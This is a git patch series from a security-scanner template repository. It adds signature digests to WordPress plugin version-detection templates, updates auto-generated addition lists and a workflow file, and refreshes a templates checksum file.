a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220319852ddfe398a3023e5702929aa625952d660252985024cfcb243637fd299f402201fe94b6658ebad42927e112b0e963395bb76464ed6b31af3767e3358edbbcced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..c5cd1fa938 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002cb7159003c69590ebc4214198fd1f1b8c798163243c707c7d55b2453aec04802202ea4568642a3f249bff0b78ccb218f609a836afd4a9488046c4e3c27dba6e84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..6f8f1eafeb 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8a3370d994776f9aa06002a388b0e640b21ca4057d545ec9eb57677ac4e7c7f02200ad415cf000ad3fd3cb88684324f25ff3e3c1302877f105782b175daf668cf46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..2a76c165e1 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dc03dffef83f6e4e23d5089ec659aaa547889016e8c6325d7d79f98a60ab3580220107ce17ed3684fa595ef117e02c12524e43670bb63059f3a15981439f9d2d258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..9e83c8a4bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce0c52270a2823c2447566da1a8d277240e957134c62019b2b1d643a77385c7a022058bc677918cda673580fb16fe4fed1839068f5b97b1dc40d7f1555e9a0f2c1e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..15edd6d165 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd43ed8213d34edefe0ec92e186674ee50beb7391ef6d0a0c822bb74e033fc35022100963a8f52687f3d05a17cb931076c2ee602e042ee0a724005c8e771f81b489517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..f90ebd1d10 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd6168be1e840f01a9988f9d27fdf3c4d945640c194953f4ff0afa04cc8f02e8022100bf4086489e9d71f26aadbd0537badacda08d7964a90d5823bdb44cd6b57cc2fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..0c8242b84c 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5097fdc17dfebf694d520cdb00079d2360ed2976300168a12a0d6168786ecf3022100d9b2c6430a1d902f75b8792a008a265dd5d450bfb85e742960331c7142d0e913:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..203157adb0 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075db0a755e4d8070eb450b895802c1a1ead8f50aa91f461a54a8796cbedbde3e02210089984253d68d24b6fd5f2f3e18f15f43a23656893448d7b5b21a3ab31e27a95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..966e622696 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085ef04ef23489f8089c92bdbce14a5e4f77ed22aa39ab3a063a23c3494946c5d022066e25ea6edd8a46b0eb7dc429a28913326b121e9107869e941f37ebc68f95179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e7f02307ae 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a0599e6a48201cfc23020b6347895ade4fa8ed59c7c5f71577bdc2783148232e022009af9f01415c8058fc2d60a0b8b29cdd88504aca7e621edb923f29b809316a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..5159085003 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220246f8878bc39375b062f06101e2a25e77eed203893b9247907874fb3ab940a1902201f9a17539bcf4a7e9cb15370d6e43299a5126dd4266edb4b3ee205b8058c5c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..4ec7215e76 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025a9264de54c265a887fe6c95b92eaffc8b6f5dc0dd9bf7ca766aa538dc892b8022007373f424ef35098f4d05fdbc9cab7f46a8ef2accf7fd4b654abf2dd9cce7e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..c2ff42f48d 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202907641e38f98753d6b4591dd46bb35a88175f573d90ba9154c429e5d263e1bc022036cf145b6f04bbb8e4573daaf3abb344e19dcd77905a40cedbf8bea34da3d3a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..5c15be7aa9 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220144ae23297bbe19320b7126cc9a31668b655110d2b4ce1da0614d018bf91107f022100dceb1d51feb3545548177c7affc4194814e9d6f28a338b5502cb11a73adb66f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..1161656677 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f48278fdda8a3a150b87525907e59c672740e52d57cfaf6c85403c0f6979a83e02204cbeb77c919c6f3890254e1482281f1029c1e8d4e4ad61d18b90597909fe1b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..0b4b625acf 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe4991754e35a05f325dda67092b7a8c323103bde7db7ba94451d58e089f2e09022100b1b25256d0b39a2238fcd17697247a2627fc0059db9a8331c1cf397945caddda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..07e0491e54 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b3a6ea7e2d226b296972012ff1dff50e8767c443aff672ff6c6d5d94510a44e402204bd31edefd6dc570eb01e01005b709064462fb982c4431839436c05ffc44c3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..a490cd15c8 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100976b18838f8ebfc7e5c2e93da5a7f5f1b00fc082c523a4dac4af427e78788a28022059e0e7572a92eeef776c49ea26ef65cddbef997ce0696c1f679e66612db39425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b08e75e3de7d1987578167fc08ae7a26d0b2b6fb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:50:32 +0000 Subject: [PATCH 0998/1841] Auto Generated New Template Addition List [Tue Jul 9 08:50:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7c7ea51bc5..90c3f0e3cd 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/misconfiguration/installer/piwigo-installer.yaml http/misconfiguration/installer/poste-io-installer.yaml http/misconfiguration/installer/subrion-installer.yaml http/misconfiguration/label-studio-signup.yaml +http/misconfiguration/laragon-phpinfo.yaml http/misconfiguration/seq-dashboard-unath.yaml http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml From c2aa43756325d22570f050e72acd06cc030cf268 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:51:49 +0000 Subject: [PATCH 0999/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 388c763b4e..f12ff694a3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/misconfiguration/installer/poste-io-installer.yaml' - 'http/misconfiguration/installer/subrion-installer.yaml' - 'http/misconfiguration/label-studio-signup.yaml' + - 'http/misconfiguration/laragon-phpinfo.yaml' - 'http/misconfiguration/seq-dashboard-unath.yaml' - 'http/technologies/apache/apache-pinot-detect.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' From 7f3dcf1971c1b5a792cfa7ffd2c403b966c4be53 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:52:21 +0000 Subject: [PATCH 1000/1841] Auto Template Signing [Tue Jul 9 08:52:21 UTC 2024] :robot: --- http/misconfiguration/laragon-phpinfo.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/laragon-phpinfo.yaml b/http/misconfiguration/laragon-phpinfo.yaml index 88e1ace621..177560752e 100644 --- a/http/misconfiguration/laragon-phpinfo.yaml +++ b/http/misconfiguration/laragon-phpinfo.yaml @@ -35,3 +35,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body +# digest: 4b0a004830460221009c19f1977f513519a1d4708eb9a28960d8c9a69ec18cc354c9ae54c700fa9a690221009282048ffc034bd0830523b3e42c7c30f2279568b797571cf13a375d7b67766c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dc9917ae92fd7965996883fa67fdc70414d1473c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 9 Jul 2024 08:54:43 +0000 Subject: [PATCH 1001/1841] Auto Generated New Template Addition List [Tue Jul 9 08:54:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 90c3f0e3cd..a41f24605a 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2023/CVE-2023-35161.yaml http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-47117.yaml http/cves/2023/CVE-2023-52251.yaml +http/cves/2024/CVE-2024-25852.yaml http/cves/2024/CVE-2024-27292.yaml http/cves/2024/CVE-2024-29972.yaml http/cves/2024/CVE-2024-32709.yaml From 8fff1b3e6b29a766457d0a2c0783462071bb3bf1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:54:55 +0000 Subject: [PATCH 1002/1841] Auto Generated Templates Checksum [Tue Jul 9 08:54:55 UTC 2024] :robot: --- templates-checksum.txt | 410 +++++++++++++++++++++-------------------- 1 file changed, 206 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5d06101994..794c922543 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,7 +3309,7 @@ http/cves/2023/CVE-2023-46732.yaml:c877d0e1689f2fb8d52ddd715d165ead948f349d http/cves/2023/CVE-2023-46747.yaml:8034386aab766649cefb93c12ae6cd42ae1b09d9 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 -http/cves/2023/CVE-2023-47117.yaml:faf95a8966811e2950ba13e99d26f923afc78d2f +http/cves/2023/CVE-2023-47117.yaml:635fbf0a6673977342270ca07f3dcb1ba360b3df http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 http/cves/2023/CVE-2023-47211.yaml:57a479e903db82adc0b54fced6f541a6fe9a7961 http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa @@ -3416,6 +3416,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 +http/cves/2024/CVE-2024-25852.yaml:d678743a8ce9a63d15bdcb3b4a9cbcfd19e71621 http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f @@ -5787,7 +5788,8 @@ http/misconfiguration/kubernetes/kubernetes-metrics.yaml:5f8fbe53b2d93640b7c2c58 http/misconfiguration/kubernetes/kubernetes-pods.yaml:a59825a464f006e6da0ce5b7232bf24c9f60c705 http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:2d7acc9dc9c77424c09ebd95f6f44206567f9a5a http/misconfiguration/kubernetes/unauth-etcd-server.yaml:178a6e16adb8beb36acd4ae83cd91805bae9a032 -http/misconfiguration/label-studio-signup.yaml:657ccc71d1a45614f489dcd68b65d01fed8429ca +http/misconfiguration/label-studio-signup.yaml:54aef8c5a8b689e16c396eb3ccd2ad95f8602f20 +http/misconfiguration/laragon-phpinfo.yaml:0ae9b00c6e9a77b964feb1551485ac396320248d http/misconfiguration/laravel-debug-enabled.yaml:b004de4a3fc780b77d514df43a916384be075f93 http/misconfiguration/laravel-debug-error.yaml:a52cdf861755ac8b258cf35a31d15b11a04fe8bb http/misconfiguration/laravel-debug-infoleak.yaml:18a8a3ab5ba1a8d728fe9fad0073d6fd378a97ae @@ -6883,7 +6885,7 @@ http/technologies/apache/default-apache2-page.yaml:3d32235cea4d966860cdac0d2832a http/technologies/apache/default-apache2-ubuntu-page.yaml:808d8b7991a7e1624b70d1fe1dcc452360318433 http/technologies/apache/kafka-manager-panel.yaml:dc3bc4035bc4069f3529349675f2c3e0ef6a1ede http/technologies/apache/ranger-detection.yaml:15fbdedf1fbe105e4bdbb03b8c6a449097801a74 -http/technologies/apache/tomcat-detect.yaml:3bd2133fba7b5fe61bb625caf06691f0c6245c59 +http/technologies/apache/tomcat-detect.yaml:60f570b2a21cd0f183ac9a313f0301f22dbb16f0 http/technologies/apache/xampp-default-page.yaml:1a2e9ae4aef8adc79a4a34e693b351bfcc23f8f9 http/technologies/apache-allura-detect.yaml:15c34736226f419e17b17aec0fe92f2171cd1cb8 http/technologies/apollo-server-detect.yaml:44245d09c9ad3e3fbca5d699041ac2bd23d329f2 @@ -7262,228 +7264,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:a7e72344b7bcec223ee4063d62a2b362c7a37e0b +http/technologies/wordpress/plugins/add-to-any.yaml:6e38d780d00390e4f965a26f186b5f2248fc0757 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:369ef2a4bf977679e45321df903a7f9caed62481 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:690e9a9a6834f5cb49e7036439ab90b497a87fb9 +http/technologies/wordpress/plugins/akismet.yaml:9bbe32506dc49c4fa8741962813acdb22656b0a4 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:fb5343e825f295133d534855710eb863a2f197d3 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:eac6998cf1a6a3d3b218d3f816b3e4819fd9d52a +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:97f925eb77a7f96d687756b0e65db6abe4ab0d99 +http/technologies/wordpress/plugins/amp.yaml:5b9f7bb509c799266f72389cbfad3f86269ecaba +http/technologies/wordpress/plugins/antispam-bee.yaml:542df3cd80dd6295bdf319ca48d27ba4bd7daa95 +http/technologies/wordpress/plugins/astra-sites.yaml:72ab35f28764dfbd9d85c70f785c07fd0a6515cd http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:426dc7830792629c5c2ba46ed4e4a800503d50dc +http/technologies/wordpress/plugins/backwpup.yaml:d0160dbcb7263b9c5976d24e480248d65599d91e +http/technologies/wordpress/plugins/better-search-replace.yaml:0af2915e14ac6175c7d3356434b5f96cc3bf2554 +http/technologies/wordpress/plugins/better-wp-security.yaml:32c98f91d4bd0470072d60d48b6f162e7c0c9026 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:5bcad211ed46846c8765a788c17aa9eb291d8d0e +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:6d024dbecf81e850f0297a47fb4d2a5baacf9972 +http/technologies/wordpress/plugins/breeze.yaml:316bf9f238d0513336203902626e84cadd065d22 +http/technologies/wordpress/plugins/broken-link-checker.yaml:af2c18509198c9be396d1bfc8e199d0a427467da +http/technologies/wordpress/plugins/chaty.yaml:69ea3099d76659574b55a3573333717406777766 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:fc825238d7081528d833b024ad2bf1a6ecf6682e +http/technologies/wordpress/plugins/classic-editor.yaml:ad0f5090f7de418b560806c41ff4a6343103008d +http/technologies/wordpress/plugins/classic-widgets.yaml:9a14336044c1fd8a88315866e925b7f9a025a034 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ed2e50f85511a411a409d39b73d4f50710a5fafd http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:05f777b88d83813943a552500fd3e83cf78b961f +http/technologies/wordpress/plugins/coblocks.yaml:443a319f5ac2deae16aac2d8e70ec38d5dffbf59 +http/technologies/wordpress/plugins/code-snippets.yaml:4be627df04f2fc47d74e170f70685f957cf713bc +http/technologies/wordpress/plugins/coming-soon.yaml:dd28d94c8ad5965195ec80694e5040a851be8251 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:595bc0e51b93aa1d68cbb9ce2e35ac230ec464bf +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:6a74a98334c627ae95d313c3843e85026eec3227 +http/technologies/wordpress/plugins/contact-form-7.yaml:5aa6de4333cc59b6523dfe48c05b2efacaeae06d +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:57e8ced64570e164bc2b5868e0aa324b2a30197a +http/technologies/wordpress/plugins/cookie-law-info.yaml:2c51eaf12950cd6c2feb2f7d269c12348f5f1427 +http/technologies/wordpress/plugins/cookie-notice.yaml:631e93b2c59598d303987655a8dee8e6afbcf40f +http/technologies/wordpress/plugins/copy-delete-posts.yaml:bdad4ca15904bf0abe9fd1bcd54981cd8059820f +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:d6f20b6263ca9d55e32d6f4469ddf03ea1b7fe71 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:197d0aa2ae5a96a74df96b4de2f41aa29896f359 +http/technologies/wordpress/plugins/custom-css-js.yaml:75b1b1b45b2226bc4770305b3fbfb1a056933b4d +http/technologies/wordpress/plugins/custom-fonts.yaml:6a175b416d770990b0a755c6413fbf986492f407 